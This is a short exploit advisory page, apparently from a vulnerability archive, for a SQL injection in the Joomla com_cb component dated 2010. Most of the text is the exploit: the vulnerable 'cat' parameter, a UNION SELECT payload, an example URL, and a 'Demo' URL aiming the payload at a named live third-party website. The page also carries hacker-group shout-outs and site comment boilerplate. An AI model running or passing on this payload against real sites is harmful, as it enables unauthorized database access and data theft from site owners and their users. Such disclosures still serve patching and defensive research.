The Joomla CB component remote SQL injection

2010.03.24
Credit: D3v1l
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Title : Joomla Component com_cb SQL Injection Vulnerability # Author: DevilZ TM # Data : 2010-03-23 [~]######################################### InformatioN #############################################[~] [~] Title : Joomla Component com_cb SQL Injection Vulnerability [~] Author : DevilZ TM By D3v1l [~] Homepage : http://www.DEVILZTM.com [~] Email : Expl0it@DevilZTM.Com [~] Contact : D3v1l.blackhat@yahoo.com [~]######################################### ExploiT #############################################[~] [~] Vulnerable File : http://127.0.0.1/index.php?option=com_cb&task=list&cat=[SQL] [~] ExploiT : -1+UNION+SELECT+1,2,3,4,5-- [~] Example : http://127.0.0.1/index.php?option=com_cb&task=list&cat=-1+UNION+SELECT+1,2,3,4,5-- [~] Demo : http://www.cashboomerang.com/index.php?option=com_cb&task=list&cat=-1+UNION+SELECT+1,2,3,4,5-- [~]######################################### ThankS To ... ############################################[~] [~] Special Thanks To My Best FriendS : Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS [~] IRANIAN Young HackerZ [~]######################################### FinisH :D #############################################[~]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top